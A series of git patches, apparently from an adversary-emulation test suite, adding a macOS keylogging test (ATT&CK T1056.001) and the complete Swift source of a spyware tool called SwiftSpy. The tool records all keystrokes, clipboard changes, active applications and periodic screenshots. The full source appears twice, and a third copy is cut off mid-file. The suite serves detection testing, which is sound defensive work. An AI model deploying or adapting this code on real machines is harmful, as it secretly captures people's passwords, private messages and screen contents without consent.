From 749c30e4b660a81c4f7188a28212f5ea3d4a1bcd Mon Sep 17 00:00:00 2001 From: Brendan Malone <46428809+RoundBunny@users.noreply.github.com> Date: Wed, 8 Jun 2022 10:13:11 -0500 Subject: [PATCH 01/11] Added MacOS Test for T1056.001 --- atomics/T1056.001/T1056.001.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) diff --git a/atomics/T1056.001/T1056.001.yaml b/atomics/T1056.001/T1056.001.yaml index 6e5f5388..96697d89 100644 --- a/atomics/T1056.001/T1056.001.yaml +++ b/atomics/T1056.001/T1056.001.yaml @@ -171,3 +171,28 @@ atomic_tests: whoami; ausearch -i --start $(date +"%d/%m/%y %H:%M:%S") cleanup_command: | systemctl restart auditd +- name: MacOS Swift Keylogger + description: | + Utilizes a swift script to log keys to sout + supported_platforms: + - macos + input_arguments: + swift_src: + description: Location of swift script + type: Path + default: PathToAtomicsFolder/T1056.001/src/MacOSKeylogger.swift + dependency_executor_name: bash + dependencies: + - description: | + swift script must exist at #{swift_src} + prereq_command: | + if [ -f #{swift_src} ]; then chmod +x #{swift_src}; else exit 1; fi + get_prereq_command: | + echo "" + executor: + command: | + ./#{swift_src} -keylog + cleanup_command: | + kill `pgrep swift-frontend` + name: bash + elevation_required: false From d2cf4f16bbc9a05ea0bb21c382e1b828cb78b256 Mon Sep 17 00:00:00 2001 From: Brendan Malone <46428809+RoundBunny@users.noreply.github.com> Date: Wed, 8 Jun 2022 10:13:51 -0500 Subject: [PATCH 02/11] Uploaded swift keylogging script --- atomics/T1056.001/src/MacOSKeylogger.swift | 403 +++++++++++++++++++++ 1 file changed, 403 insertions(+) create mode 100644 atomics/T1056.001/src/MacOSKeylogger.swift diff --git a/atomics/T1056.001/src/MacOSKeylogger.swift b/atomics/T1056.001/src/MacOSKeylogger.swift new file mode 100644 index 00000000..c842aaca --- /dev/null +++ b/atomics/T1056.001/src/MacOSKeylogger.swift @@ -0,0 +1,403 @@ +#!/usr/bin/swift +import Cocoa +import Foundation +import IOKit.hid +import AppKit + + +var capslock = false + +var keyMap: [UInt32:[String]] +{ + var map = [UInt32:[String]]() + map[4] = ["a","A"] + map[5] = ["b","B"] + map[6] = ["c","C"] + map[7] = ["d","D"] + map[8] = ["e","E"] + map[9] = ["f","F"] + map[10] = ["g","G"] + map[11] = ["h","H"] + map[12] = ["i","I"] + map[13] = ["j","J"] + map[14] = ["k","K"] + map[15] = ["l","L"] + map[16] = ["m","M"] + map[17] = ["n","N"] + map[18] = ["o","O"] + map[19] = ["p","P"] + map[20] = ["q","Q"] + map[21] = ["r","R"] + map[22] = ["s","S"] + map[23] = ["t","T"] + map[24] = ["u","U"] + map[25] = ["v","V"] + map[26] = ["w","W"] + map[27] = ["x","X"] + map[28] = ["y","Y"] + map[29] = ["z","Z"] + map[30] = ["1","!"] + map[31] = ["2","@"] + map[32] = ["3","#"] + map[33] = ["4","$"] + map[34] = ["5","%"] + map[35] = ["6","^"] + map[36] = ["7","&"] + map[37] = ["8","*"] + map[38] = ["9","("] + map[39] = ["0",")"] + map[40] = ["\n","\n"] + map[41] = ["[ESCAPE]","[ESCAPE]"] + map[42] = ["[DELETE|BACKSPACE]","[DELETE|BACKSPACE]"] // + map[43] = ["[TAB]","[TAB]"] + map[44] = [" "," "] + map[45] = ["-","_"] + map[46] = ["=","+"] + map[47] = ["[","{"] + map[48] = ["]","}"] + map[49] = ["\\","|"] + map[50] = ["",""] // Keyboard Non-US# and ~2 + map[51] = [";",":"] + map[52] = ["'","\""] + map[53] = ["`","~"] + map[54] = [",","<"] + map[55] = [".",">"] + map[56] = ["/","?"] + map[57] = ["[CAPSLOCK]","[CAPSLOCK]"] + map[58] = ["[F1]","[F1]"] + map[59] = ["[F2]","[F2]"] + map[60] = ["[F3]","[F3]"] + map[61] = ["[F4]","[F4]"] + map[62] = ["[F5]","[F5]"] + map[63] = ["[F6]","[F6]"] + map[64] = ["[F7]","[F7]"] + map[65] = ["[F8]","[F8]"] + map[66] = ["[F9]","[F9]"] + map[67] = ["[F10]","[F10]"] + map[68] = ["[F11]","[F11]"] + map[69] = ["[F12]","[F12]"] + map[70] = ["[PRINTSCREEN]","[PRINTSCREEN]"] + map[71] = ["[SCROLL-LOCK]","[SCROLL-LOCK]"] + map[72] = ["[PAUSE]","[PAUSE]"] + map[73] = ["[INSERT]","[INSERT]"] + map[74] = ["[HOME]","[HOME]"] + map[75] = ["[PAGEUP]","[PAGEUP]"] + map[76] = ["[DELETE-FORWARD]","[DELETE-FORWARD]"] // + map[77] = ["[END]","[END]"] + map[78] = ["[PAGEDOWN]","[PAGEDOWN]"] + map[79] = ["[RIGHTARROW]","[RIGHTARROW]"] + map[80] = ["[LEFTARROW]","[LEFTARROW]"] + map[81] = ["[DOWNARROW]","[DOWNARROW]"] + map[82] = ["[UPARROW]","[UPARROW]"] + map[83] = ["[NUMLOCK]","[CLEAR]"] + // Keypads + map[84] = ["/","/"] + map[85] = ["*","*"] + map[86] = ["-","-"] + map[87] = ["+","+"] + map[88] = ["[ENTER]","[ENTER]"] + map[89] = ["1","[END]"] + map[90] = ["2","[DOWNARROW]"] + map[91] = ["3","[PAGEDOWN]"] + map[92] = ["4","[LEFTARROW]"] + map[93] = ["5","5"] + map[94] = ["6","[RIGHTARROW]"] + map[95] = ["7","[HOME]"] + map[96] = ["8","[UPARROW]"] + map[97] = ["9","[PAGEUP]"] + map[98] = ["0","[INSERT]"] + map[99] = [".","[DELETE]"] + map[100] = ["",""] // + ///// + map[224] = ["[LCTRL]","[LCTRL]"] // left control + map[225] = ["[LSHIFT_PRESS]","[SHIFT_RELEASE]"] // left shift + map[226] = ["[LALT]","[LALT]"] // left alt + map[227] = ["[LCMD]","[LCMD]"] // left cmd + map[228] = ["[RCTRL]","[RCTRL]"] // right control + map[229] = ["[RSHIFT_PRESS]","[SHIFT_RELEASE]"] // right shift + map[230] = ["[RALT]","[RALT]"] // right alt + map[231] = ["[RCMD]","[RCMD]"] // right cmd + return map +} + +class SwiftSpy +{ + func ActiveApp() + { + // Hook active application + let notificationCenter = NSWorkspace.shared.notificationCenter + notificationCenter.addObserver(forName: NSWorkspace.didActivateApplicationNotification, object: nil, queue: OperationQueue.main) + { (notificationCenter: Notification) in + + let currentApp = notificationCenter.userInfo!["NSWorkspaceApplicationKey"] as! NSRunningApplication + print("") + print("[+] New Active App:", currentApp.localizedName!) + } + RunLoop.current.run() + } + + func ClipboardMonitor() + { + setbuf(__stdoutp, nil) + let pasteboard = NSPasteboard.general + var changeCount = NSPasteboard.general.changeCount + while true { + Thread.sleep(forTimeInterval: 1.0) + if let clipboardData = pasteboard.string(forType: .string) + { + if pasteboard.changeCount != changeCount + { + print("") + print("[+] Copy event detected at", NSDate(), "(UTC)!") + print("[+] Clipboard Data:", clipboardData) + changeCount = pasteboard.changeCount + } + } + } + } + + // https://stackoverflow.com/questions/7190852/using-iohidmanager-to-get-modifier-key-events + // https://stackoverflow.com/questions/30380400/how-to-tap-hook-keyboard-events-in-osx-and-record-which-keyboard-fires-each-even + var Handle_IOHIDInputValueCallback: IOHIDValueCallback = { context, result, sender, value in + let elem: IOHIDElement = IOHIDValueGetElement(value); + let scancode = IOHIDElementGetUsage(elem); + + if (IOHIDElementGetUsagePage(elem) != 0x07) + { + return + } + + // invalid keys + if (scancode < 4 || scancode > 231) + { + return; + } + + // returns 1 when a key was pressed and 0 when a key is released + let pressed = IOHIDValueGetIntegerValue(value); + if (pressed == 1) + { + // modifying caplocks variable and return + if (scancode == 57) + { + capslock = !capslock + print(keyMap[scancode]![0], terminator:"") + return + } + + // print shift up and return + if (scancode == 225 || scancode == 229) + { + print(keyMap[scancode]![0], terminator:"") + return + } + + // no capslock + if (capslock == false) + { + print(keyMap[scancode]![0], terminator:"") + + } + // capslock on + else if (capslock == true) + { + // only capitalize letters + if (scancode >= 4 && scancode <= 29) + { + print(keyMap[scancode]![1], terminator:"") + } + else + { + print(keyMap[scancode]![0], terminator:"") + } + } + } + else if((pressed == 0) && (scancode == 225 || scancode == 229)) + { + print(keyMap[scancode]![1], terminator:"") + } + } + + // https://stackoverflow.com/questions/8676135/osx-hid-filter-for-secondary-keyboard + // https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/HID/new_api_10_5/tn2187.html + // https://stackoverflow.com/questions/48070396/how-to-get-list-of-hid-devices-in-a-swift-cocoa-application + func Keylog() + { + // Create HID Manager + let HIDManager = IOHIDManagerCreate(kCFAllocatorDefault, 0) + if (CFGetTypeID(HIDManager) != IOHIDManagerGetTypeID()) + { + print("[-] Could not create HID manager") + exit(1); + } + else + { + print("[+] HID manager created!") + } + + // Setup device filtering, + func CreateDeviceMatchingDictionary( usagePage: Int, usage: Int) -> CFMutableDictionary { + let dict = [ + kIOHIDDeviceUsageKey: usage, + kIOHIDDeviceUsagePageKey: usagePage + ] as NSDictionary + + return dict.mutableCopy() as! NSMutableDictionary; + } + let keyboard = CreateDeviceMatchingDictionary(usagePage: kHIDPage_GenericDesktop, usage: kHIDUsage_GD_Keyboard) + IOHIDManagerSetDeviceMatching(HIDManager, keyboard) + + // Enumerate keyboard devices + let devices = IOHIDManagerCopyDevices(HIDManager) + if (devices != nil) { + print("[+] HID Devices enumerated:") + print(devices!) + } + else + { + print("[-] Could not find any devices") + exit(1); + } + + // Setup callback + let context = UnsafeMutableRawPointer(Unmanaged.passUnretained(self).toOpaque()) + IOHIDManagerRegisterInputValueCallback(HIDManager, Handle_IOHIDInputValueCallback, context); + + // Open HID Manager + let ioreturn: IOReturn = IOHIDManagerOpen(HIDManager, IOOptionBits(kIOHIDOptionsTypeNone) ) + if ioreturn != kIOReturnSuccess + { + print("[-] Could not open HID manager") + print("\nThis is likely because the application running this does not have Input Monitoring permissions.") + print("You can enable them in System Preferences > Security and Privacy > Input Monitoring.") + exit(1); + } + else + { + print("[+] HID manager opened!") + } + + // Start RunLoop + let calendar = Calendar.current + IOHIDManagerScheduleWithRunLoop(HIDManager, CFRunLoopGetCurrent(), CFRunLoopMode.defaultMode.rawValue) + RunLoop.current.run(until: calendar.date(byAdding: .second, value: 5, to: Date.now)!) + exit(0); + } + + // https://stackoverflow.com/questions/39691106/programmatically-screenshot-swift-3-macos/40864231#40864231 + func Screenshot(folderName: String) + { + var displayCount: UInt32 = 0; + var result = CGGetActiveDisplayList(0, nil, &displayCount) + if (result != CGError.success) { + print("Error: \(result)") + return + } + let allocated = Int(displayCount) + let activeDisplays = UnsafeMutablePointer.allocate(capacity: allocated) + result = CGGetActiveDisplayList(displayCount, activeDisplays, &displayCount) + + if (result != CGError.success) { + print("Error: \(result)") + return + } + + for i in 1...displayCount { + let unixTimestamp = Date() + let fileUrl = URL(fileURLWithPath: folderName + "\(unixTimestamp)" + "_" + "\(i)" + ".jpg", isDirectory: true) + let screenShot:CGImage = CGDisplayCreateImage(activeDisplays[Int(i-1)])! + let bitmapRep = NSBitmapImageRep(cgImage: screenShot) + let jpegData = bitmapRep.representation(using: NSBitmapImageRep.FileType.jpeg, properties: [:])! + + do { + try jpegData.write(to: fileUrl, options: .atomic) + } + catch {print("Error: \(error)")} + } + } +} + +func Help() +{ + print("SwiftSpy by @slyd0g") + print("Usage:") + print("-h || -help | Print help menu") + print("-keylog | Logs all keystrokes to stdout using IOHIDManager* APIs, requires 'Input Monitoring' permissions") + print("-clipboard | Monitors for changes to the system clipboard and logs to stdout") + print("-allkeys | Runs both the keylog and clipboard modules, requires 'Input Monitoring' permissions") + print("-screenshot /tmp | Takes a screenshot of the user's screen and saves to the /tmp, requires 'Screen Recording` permissions") + print("-screenshot /tmp 5 | Takes a screenshot every 5 seconds and saves to /tmp, requires 'Screen Recording` permissions") +} + +var swiftSpy = SwiftSpy() + +if CommandLine.arguments.count == 1 +{ + Help() + exit(0) +} +else +{ + for argument in CommandLine.arguments + { + if (argument.contains("-h") || argument.contains("-help")) + { + Help() + exit(0) + } + else + { + if argument.contains("-keylog") + { + DispatchQueue.global(qos: .background).async { + swiftSpy.Keylog() + + } + swiftSpy.ActiveApp() + } + if argument.contains("-clipboard") + { + DispatchQueue.global(qos: .background).async { + swiftSpy.ClipboardMonitor() + + } + swiftSpy.ActiveApp() + } + if argument.contains("-allkeys") + { + DispatchQueue.global(qos: .background).async { + swiftSpy.ClipboardMonitor() + + } + DispatchQueue.global(qos: .background).async { + swiftSpy.Keylog() + + } + swiftSpy.ActiveApp() + } + if argument.contains("-screenshot") + { + var folder = CommandLine.arguments[2] + if (!folder.hasSuffix("/")) + { + folder.append("/") + } + + if CommandLine.arguments.count == 4 + { + let timer = UInt32(CommandLine.arguments[3]) + + while(true) + { + swiftSpy.Screenshot(folderName: folder) + sleep(timer!) + } + } + else + { + swiftSpy.Screenshot(folderName: folder) + } + } + } + } +} From 1bfc4dc6e366129cf251cc79a285d74ba24f4831 Mon Sep 17 00:00:00 2001 From: Brendan Malone <46428809+RoundBunny@users.noreply.github.com> Date: Thu, 9 Jun 2022 09:48:27 -0500 Subject: [PATCH 03/11] Updated descriptions --- atomics/T1056.001/T1056.001.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/atomics/T1056.001/T1056.001.yaml b/atomics/T1056.001/T1056.001.yaml index 96697d89..122209d6 100644 --- a/atomics/T1056.001/T1056.001.yaml +++ b/atomics/T1056.001/T1056.001.yaml @@ -173,7 +173,8 @@ atomic_tests: systemctl restart auditd - name: MacOS Swift Keylogger description: | - Utilizes a swift script to log keys to sout + Utilizes a swift script to log keys to sout. It runs for 5 seconds then dumps the output to standard. Input Monitoring is required. + Input Monitoring can be enabled in System Preferences > Security & Privacy > Privacy > Input Monitoring supported_platforms: - macos input_arguments: @@ -184,7 +185,7 @@ atomic_tests: dependency_executor_name: bash dependencies: - description: | - swift script must exist at #{swift_src} + swift script must exist at #{swift_src}, and the terminal must have input monitoring permissions. prereq_command: | if [ -f #{swift_src} ]; then chmod +x #{swift_src}; else exit 1; fi get_prereq_command: | From 9982660ef4033b5f0402f775740518ed6ea2c2ae Mon Sep 17 00:00:00 2001 From: Brendan Malone <46428809+RoundBunny@users.noreply.github.com> Date: Thu, 9 Jun 2022 10:19:39 -0500 Subject: [PATCH 05/11] Delete MacOSKeylogger.swift --- atomics/T1056.001/src/MacOSKeylogger.swift | 403 --------------------- 1 file changed, 403 deletions(-) delete mode 100644 atomics/T1056.001/src/MacOSKeylogger.swift diff --git a/atomics/T1056.001/src/MacOSKeylogger.swift b/atomics/T1056.001/src/MacOSKeylogger.swift deleted file mode 100644 index c842aaca..00000000 --- a/atomics/T1056.001/src/MacOSKeylogger.swift +++ /dev/null @@ -1,403 +0,0 @@ -#!/usr/bin/swift -import Cocoa -import Foundation -import IOKit.hid -import AppKit - - -var capslock = false - -var keyMap: [UInt32:[String]] -{ - var map = [UInt32:[String]]() - map[4] = ["a","A"] - map[5] = ["b","B"] - map[6] = ["c","C"] - map[7] = ["d","D"] - map[8] = ["e","E"] - map[9] = ["f","F"] - map[10] = ["g","G"] - map[11] = ["h","H"] - map[12] = ["i","I"] - map[13] = ["j","J"] - map[14] = ["k","K"] - map[15] = ["l","L"] - map[16] = ["m","M"] - map[17] = ["n","N"] - map[18] = ["o","O"] - map[19] = ["p","P"] - map[20] = ["q","Q"] - map[21] = ["r","R"] - map[22] = ["s","S"] - map[23] = ["t","T"] - map[24] = ["u","U"] - map[25] = ["v","V"] - map[26] = ["w","W"] - map[27] = ["x","X"] - map[28] = ["y","Y"] - map[29] = ["z","Z"] - map[30] = ["1","!"] - map[31] = ["2","@"] - map[32] = ["3","#"] - map[33] = ["4","$"] - map[34] = ["5","%"] - map[35] = ["6","^"] - map[36] = ["7","&"] - map[37] = ["8","*"] - map[38] = ["9","("] - map[39] = ["0",")"] - map[40] = ["\n","\n"] - map[41] = ["[ESCAPE]","[ESCAPE]"] - map[42] = ["[DELETE|BACKSPACE]","[DELETE|BACKSPACE]"] // - map[43] = ["[TAB]","[TAB]"] - map[44] = [" "," "] - map[45] = ["-","_"] - map[46] = ["=","+"] - map[47] = ["[","{"] - map[48] = ["]","}"] - map[49] = ["\\","|"] - map[50] = ["",""] // Keyboard Non-US# and ~2 - map[51] = [";",":"] - map[52] = ["'","\""] - map[53] = ["`","~"] - map[54] = [",","<"] - map[55] = [".",">"] - map[56] = ["/","?"] - map[57] = ["[CAPSLOCK]","[CAPSLOCK]"] - map[58] = ["[F1]","[F1]"] - map[59] = ["[F2]","[F2]"] - map[60] = ["[F3]","[F3]"] - map[61] = ["[F4]","[F4]"] - map[62] = ["[F5]","[F5]"] - map[63] = ["[F6]","[F6]"] - map[64] = ["[F7]","[F7]"] - map[65] = ["[F8]","[F8]"] - map[66] = ["[F9]","[F9]"] - map[67] = ["[F10]","[F10]"] - map[68] = ["[F11]","[F11]"] - map[69] = ["[F12]","[F12]"] - map[70] = ["[PRINTSCREEN]","[PRINTSCREEN]"] - map[71] = ["[SCROLL-LOCK]","[SCROLL-LOCK]"] - map[72] = ["[PAUSE]","[PAUSE]"] - map[73] = ["[INSERT]","[INSERT]"] - map[74] = ["[HOME]","[HOME]"] - map[75] = ["[PAGEUP]","[PAGEUP]"] - map[76] = ["[DELETE-FORWARD]","[DELETE-FORWARD]"] // - map[77] = ["[END]","[END]"] - map[78] = ["[PAGEDOWN]","[PAGEDOWN]"] - map[79] = ["[RIGHTARROW]","[RIGHTARROW]"] - map[80] = ["[LEFTARROW]","[LEFTARROW]"] - map[81] = ["[DOWNARROW]","[DOWNARROW]"] - map[82] = ["[UPARROW]","[UPARROW]"] - map[83] = ["[NUMLOCK]","[CLEAR]"] - // Keypads - map[84] = ["/","/"] - map[85] = ["*","*"] - map[86] = ["-","-"] - map[87] = ["+","+"] - map[88] = ["[ENTER]","[ENTER]"] - map[89] = ["1","[END]"] - map[90] = ["2","[DOWNARROW]"] - map[91] = ["3","[PAGEDOWN]"] - map[92] = ["4","[LEFTARROW]"] - map[93] = ["5","5"] - map[94] = ["6","[RIGHTARROW]"] - map[95] = ["7","[HOME]"] - map[96] = ["8","[UPARROW]"] - map[97] = ["9","[PAGEUP]"] - map[98] = ["0","[INSERT]"] - map[99] = [".","[DELETE]"] - map[100] = ["",""] // - ///// - map[224] = ["[LCTRL]","[LCTRL]"] // left control - map[225] = ["[LSHIFT_PRESS]","[SHIFT_RELEASE]"] // left shift - map[226] = ["[LALT]","[LALT]"] // left alt - map[227] = ["[LCMD]","[LCMD]"] // left cmd - map[228] = ["[RCTRL]","[RCTRL]"] // right control - map[229] = ["[RSHIFT_PRESS]","[SHIFT_RELEASE]"] // right shift - map[230] = ["[RALT]","[RALT]"] // right alt - map[231] = ["[RCMD]","[RCMD]"] // right cmd - return map -} - -class SwiftSpy -{ - func ActiveApp() - { - // Hook active application - let notificationCenter = NSWorkspace.shared.notificationCenter - notificationCenter.addObserver(forName: NSWorkspace.didActivateApplicationNotification, object: nil, queue: OperationQueue.main) - { (notificationCenter: Notification) in - - let currentApp = notificationCenter.userInfo!["NSWorkspaceApplicationKey"] as! NSRunningApplication - print("") - print("[+] New Active App:", currentApp.localizedName!) - } - RunLoop.current.run() - } - - func ClipboardMonitor() - { - setbuf(__stdoutp, nil) - let pasteboard = NSPasteboard.general - var changeCount = NSPasteboard.general.changeCount - while true { - Thread.sleep(forTimeInterval: 1.0) - if let clipboardData = pasteboard.string(forType: .string) - { - if pasteboard.changeCount != changeCount - { - print("") - print("[+] Copy event detected at", NSDate(), "(UTC)!") - print("[+] Clipboard Data:", clipboardData) - changeCount = pasteboard.changeCount - } - } - } - } - - // https://stackoverflow.com/questions/7190852/using-iohidmanager-to-get-modifier-key-events - // https://stackoverflow.com/questions/30380400/how-to-tap-hook-keyboard-events-in-osx-and-record-which-keyboard-fires-each-even - var Handle_IOHIDInputValueCallback: IOHIDValueCallback = { context, result, sender, value in - let elem: IOHIDElement = IOHIDValueGetElement(value); - let scancode = IOHIDElementGetUsage(elem); - - if (IOHIDElementGetUsagePage(elem) != 0x07) - { - return - } - - // invalid keys - if (scancode < 4 || scancode > 231) - { - return; - } - - // returns 1 when a key was pressed and 0 when a key is released - let pressed = IOHIDValueGetIntegerValue(value); - if (pressed == 1) - { - // modifying caplocks variable and return - if (scancode == 57) - { - capslock = !capslock - print(keyMap[scancode]![0], terminator:"") - return - } - - // print shift up and return - if (scancode == 225 || scancode == 229) - { - print(keyMap[scancode]![0], terminator:"") - return - } - - // no capslock - if (capslock == false) - { - print(keyMap[scancode]![0], terminator:"") - - } - // capslock on - else if (capslock == true) - { - // only capitalize letters - if (scancode >= 4 && scancode <= 29) - { - print(keyMap[scancode]![1], terminator:"") - } - else - { - print(keyMap[scancode]![0], terminator:"") - } - } - } - else if((pressed == 0) && (scancode == 225 || scancode == 229)) - { - print(keyMap[scancode]![1], terminator:"") - } - } - - // https://stackoverflow.com/questions/8676135/osx-hid-filter-for-secondary-keyboard - // https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/HID/new_api_10_5/tn2187.html - // https://stackoverflow.com/questions/48070396/how-to-get-list-of-hid-devices-in-a-swift-cocoa-application - func Keylog() - { - // Create HID Manager - let HIDManager = IOHIDManagerCreate(kCFAllocatorDefault, 0) - if (CFGetTypeID(HIDManager) != IOHIDManagerGetTypeID()) - { - print("[-] Could not create HID manager") - exit(1); - } - else - { - print("[+] HID manager created!") - } - - // Setup device filtering, - func CreateDeviceMatchingDictionary( usagePage: Int, usage: Int) -> CFMutableDictionary { - let dict = [ - kIOHIDDeviceUsageKey: usage, - kIOHIDDeviceUsagePageKey: usagePage - ] as NSDictionary - - return dict.mutableCopy() as! NSMutableDictionary; - } - let keyboard = CreateDeviceMatchingDictionary(usagePage: kHIDPage_GenericDesktop, usage: kHIDUsage_GD_Keyboard) - IOHIDManagerSetDeviceMatching(HIDManager, keyboard) - - // Enumerate keyboard devices - let devices = IOHIDManagerCopyDevices(HIDManager) - if (devices != nil) { - print("[+] HID Devices enumerated:") - print(devices!) - } - else - { - print("[-] Could not find any devices") - exit(1); - } - - // Setup callback - let context = UnsafeMutableRawPointer(Unmanaged.passUnretained(self).toOpaque()) - IOHIDManagerRegisterInputValueCallback(HIDManager, Handle_IOHIDInputValueCallback, context); - - // Open HID Manager - let ioreturn: IOReturn = IOHIDManagerOpen(HIDManager, IOOptionBits(kIOHIDOptionsTypeNone) ) - if ioreturn != kIOReturnSuccess - { - print("[-] Could not open HID manager") - print("\nThis is likely because the application running this does not have Input Monitoring permissions.") - print("You can enable them in System Preferences > Security and Privacy > Input Monitoring.") - exit(1); - } - else - { - print("[+] HID manager opened!") - } - - // Start RunLoop - let calendar = Calendar.current - IOHIDManagerScheduleWithRunLoop(HIDManager, CFRunLoopGetCurrent(), CFRunLoopMode.defaultMode.rawValue) - RunLoop.current.run(until: calendar.date(byAdding: .second, value: 5, to: Date.now)!) - exit(0); - } - - // https://stackoverflow.com/questions/39691106/programmatically-screenshot-swift-3-macos/40864231#40864231 - func Screenshot(folderName: String) - { - var displayCount: UInt32 = 0; - var result = CGGetActiveDisplayList(0, nil, &displayCount) - if (result != CGError.success) { - print("Error: \(result)") - return - } - let allocated = Int(displayCount) - let activeDisplays = UnsafeMutablePointer.allocate(capacity: allocated) - result = CGGetActiveDisplayList(displayCount, activeDisplays, &displayCount) - - if (result != CGError.success) { - print("Error: \(result)") - return - } - - for i in 1...displayCount { - let unixTimestamp = Date() - let fileUrl = URL(fileURLWithPath: folderName + "\(unixTimestamp)" + "_" + "\(i)" + ".jpg", isDirectory: true) - let screenShot:CGImage = CGDisplayCreateImage(activeDisplays[Int(i-1)])! - let bitmapRep = NSBitmapImageRep(cgImage: screenShot) - let jpegData = bitmapRep.representation(using: NSBitmapImageRep.FileType.jpeg, properties: [:])! - - do { - try jpegData.write(to: fileUrl, options: .atomic) - } - catch {print("Error: \(error)")} - } - } -} - -func Help() -{ - print("SwiftSpy by @slyd0g") - print("Usage:") - print("-h || -help | Print help menu") - print("-keylog | Logs all keystrokes to stdout using IOHIDManager* APIs, requires 'Input Monitoring' permissions") - print("-clipboard | Monitors for changes to the system clipboard and logs to stdout") - print("-allkeys | Runs both the keylog and clipboard modules, requires 'Input Monitoring' permissions") - print("-screenshot /tmp | Takes a screenshot of the user's screen and saves to the /tmp, requires 'Screen Recording` permissions") - print("-screenshot /tmp 5 | Takes a screenshot every 5 seconds and saves to /tmp, requires 'Screen Recording` permissions") -} - -var swiftSpy = SwiftSpy() - -if CommandLine.arguments.count == 1 -{ - Help() - exit(0) -} -else -{ - for argument in CommandLine.arguments - { - if (argument.contains("-h") || argument.contains("-help")) - { - Help() - exit(0) - } - else - { - if argument.contains("-keylog") - { - DispatchQueue.global(qos: .background).async { - swiftSpy.Keylog() - - } - swiftSpy.ActiveApp() - } - if argument.contains("-clipboard") - { - DispatchQueue.global(qos: .background).async { - swiftSpy.ClipboardMonitor() - - } - swiftSpy.ActiveApp() - } - if argument.contains("-allkeys") - { - DispatchQueue.global(qos: .background).async { - swiftSpy.ClipboardMonitor() - - } - DispatchQueue.global(qos: .background).async { - swiftSpy.Keylog() - - } - swiftSpy.ActiveApp() - } - if argument.contains("-screenshot") - { - var folder = CommandLine.arguments[2] - if (!folder.hasSuffix("/")) - { - folder.append("/") - } - - if CommandLine.arguments.count == 4 - { - let timer = UInt32(CommandLine.arguments[3]) - - while(true) - { - swiftSpy.Screenshot(folderName: folder) - sleep(timer!) - } - } - else - { - swiftSpy.Screenshot(folderName: folder) - } - } - } - } -} From c8b80f6fcef2a813efebde907c73b387af228399 Mon Sep 17 00:00:00 2001 From: Brendan Malone <46428809+RoundBunny@users.noreply.github.com> Date: Thu, 9 Jun 2022 10:19:55 -0500 Subject: [PATCH 06/11] Add files via upload --- atomics/T1056.001/src/MacOSKeylogger.swift | 403 +++++++++++++++++++++ 1 file changed, 403 insertions(+) create mode 100644 atomics/T1056.001/src/MacOSKeylogger.swift diff --git a/atomics/T1056.001/src/MacOSKeylogger.swift b/atomics/T1056.001/src/MacOSKeylogger.swift new file mode 100644 index 00000000..c842aaca --- /dev/null +++ b/atomics/T1056.001/src/MacOSKeylogger.swift @@ -0,0 +1,403 @@ +#!/usr/bin/swift +import Cocoa +import Foundation +import IOKit.hid +import AppKit + + +var capslock = false + +var keyMap: [UInt32:[String]] +{ + var map = [UInt32:[String]]() + map[4] = ["a","A"] + map[5] = ["b","B"] + map[6] = ["c","C"] + map[7] = ["d","D"] + map[8] = ["e","E"] + map[9] = ["f","F"] + map[10] = ["g","G"] + map[11] = ["h","H"] + map[12] = ["i","I"] + map[13] = ["j","J"] + map[14] = ["k","K"] + map[15] = ["l","L"] + map[16] = ["m","M"] + map[17] = ["n","N"] + map[18] = ["o","O"] + map[19] = ["p","P"] + map[20] = ["q","Q"] + map[21] = ["r","R"] + map[22] = ["s","S"] + map[23] = ["t","T"] + map[24] = ["u","U"] + map[25] = ["v","V"] + map[26] = ["w","W"] + map[27] = ["x","X"] + map[28] = ["y","Y"] + map[29] = ["z","Z"] + map[30] = ["1","!"] + map[31] = ["2","@"] + map[32] = ["3","#"] + map[33] = ["4","$"] + map[34] = ["5","%"] + map[35] = ["6","^"] + map[36] = ["7","&"] + map[37] = ["8","*"] + map[38] = ["9","("] + map[39] = ["0",")"] + map[40] = ["\n","\n"] + map[41] = ["[ESCAPE]","[ESCAPE]"] + map[42] = ["[DELETE|BACKSPACE]","[DELETE|BACKSPACE]"] // + map[43] = ["[TAB]","[TAB]"] + map[44] = [" "," "] + map[45] = ["-","_"] + map[46] = ["=","+"] + map[47] = ["[","{"] + map[48] = ["]","}"] + map[49] = ["\\","|"] + map[50] = ["",""] // Keyboard Non-US# and ~2 + map[51] = [";",":"] + map[52] = ["'","\""] + map[53] = ["`","~"] + map[54] = [",","<"] + map[55] = [".",">"] + map[56] = ["/","?"] + map[57] = ["[CAPSLOCK]","[CAPSLOCK]"] + map[58] = ["[F1]","[F1]"] + map[59] = ["[F2]","[F2]"] + map[60] = ["[F3]","[F3]"] + map[61] = ["[F4]","[F4]"] + map[62] = ["[F5]","[F5]"] + map[63] = ["[F6]","[F6]"] + map[64] = ["[F7]","[F7]"] + map[65] = ["[F8]","[F8]"] + map[66] = ["[F9]","[F9]"] + map[67] = ["[F10]","[F10]"] + map[68] = ["[F11]","[F11]"] + map[69] = ["[F12]","[F12]"] + map[70] = ["[PRINTSCREEN]","[PRINTSCREEN]"] + map[71] = ["[SCROLL-LOCK]","[SCROLL-LOCK]"] + map[72] = ["[PAUSE]","[PAUSE]"] + map[73] = ["[INSERT]","[INSERT]"] + map[74] = ["[HOME]","[HOME]"] + map[75] = ["[PAGEUP]","[PAGEUP]"] + map[76] = ["[DELETE-FORWARD]","[DELETE-FORWARD]"] // + map[77] = ["[END]","[END]"] + map[78] = ["[PAGEDOWN]","[PAGEDOWN]"] + map[79] = ["[RIGHTARROW]","[RIGHTARROW]"] + map[80] = ["[LEFTARROW]","[LEFTARROW]"] + map[81] = ["[DOWNARROW]","[DOWNARROW]"] + map[82] = ["[UPARROW]","[UPARROW]"] + map[83] = ["[NUMLOCK]","[CLEAR]"] + // Keypads + map[84] = ["/","/"] + map[85] = ["*","*"] + map[86] = ["-","-"] + map[87] = ["+","+"] + map[88] = ["[ENTER]","[ENTER]"] + map[89] = ["1","[END]"] + map[90] = ["2","[DOWNARROW]"] + map[91] = ["3","[PAGEDOWN]"] + map[92] = ["4","[LEFTARROW]"] + map[93] = ["5","5"] + map[94] = ["6","[RIGHTARROW]"] + map[95] = ["7","[HOME]"] + map[96] = ["8","[UPARROW]"] + map[97] = ["9","[PAGEUP]"] + map[98] = ["0","[INSERT]"] + map[99] = [".","[DELETE]"] + map[100] = ["",""] // + ///// + map[224] = ["[LCTRL]","[LCTRL]"] // left control + 